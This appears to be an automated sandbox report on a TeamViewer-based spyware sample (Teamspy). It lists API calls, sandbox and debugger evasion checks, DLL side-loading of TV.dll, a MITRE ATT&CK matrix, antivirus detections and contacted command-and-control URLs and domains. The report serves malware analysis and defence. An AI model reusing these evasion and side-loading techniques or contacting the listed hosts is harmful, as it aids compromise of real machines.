Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560Thread sleep count: 269 > 30
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560Thread sleep time: -134500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5264Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5720Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmpBinary or memory string: $@Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.747809798.00000282E4429000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000003.412988843.0000000000B1C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWSysWOW64\FirewallControlPanel.dll,-12122!3
Source: svchost.exe, 0000000E.00000002.490833749.000001C4950A9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeOpen window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B510 GetProcessHeap,HeapFree,HeapFree,HeapDestroy,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detectedShow sources
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335130 LogonUserW,GetLastError,CloseHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle,
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmpBinary or memory string: Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmpBinary or memory string: user841675usProgram ManagerC:\Windows\explorer.exe3910722678072
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,762AA680,lstrcat,lstrlen,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation11DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsNative API1DLL Search Order Hijacking2DLL Search Order Hijacking2Obfuscated Files or Information2LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsService Execution12Create Account1Valid Accounts2Software Packing1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts2Access Token Manipulation21DLL Side-Loading1NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronWindows Service22Windows Service22DLL Search Order Hijacking2LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRegistry Run Keys / Startup Folder1Process Injection12Masquerading12Cached Domain CredentialsSecurity Software Discovery451VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Valid Accounts2DCSyncVirtualization/Sandbox Evasion22Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion22Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation21/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
77Etc0bR2v.exe38%VirustotalBrowse
77Etc0bR2v.exe11%MetadefenderBrowse
77Etc0bR2v.exe38%ReversingLabsWin32.Trojan.Teamspy

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\TeamViewer\TV.dll27%ReversingLabsWin32.Trojan.SpywareX
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
1.2.77Etc0bR2v.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
1.0.77Etc0bR2v.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=100000010%Avira URL Cloudsafe
http://37.252.232.109/0%Avira URL Cloudsafe
https://outnegorave.info/60%Avira URL Cloudsafe
http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=100000020%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://outnegorave.info/B8C631A8/0%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate20%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001s0%Avira URL Cloudsafe
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001q0%Avira URL Cloudsafe
https://outnegorave.info/0%Avira URL Cloudsafe
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001l0%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGateP0%Avira URL Cloudsafe
https://outnegorave.info/8C631A8/0%Avira URL Cloudsafe
http://go.teamviewer.comn00%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/700%Avira URL Cloudsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://outnegorave.info/allControlPanel.dll0%Avira URL Cloudsafe
http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=100000%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate00%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
https://outnegorave.info/B8C631A8/87096&p=100000010%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/s0%Avira URL Cloudsafe
https://outnegorave.info/B8C631A8/x0%Avira URL Cloudsafe
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateY0%Avira URL Cloudsafe
http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001l0%Avira URL Cloudsafe
http://37.252.232.109/32172969&client=DynGate&p=10000002v0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
outnegorave.info
172.67.205.33
truefalse
    		high
    master1.teamviewer.com
    		185.188.32.1
    		truefalse
      		high
      ping3.dyngate.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001false
        • Avira URL Cloud: safe
        		unknown
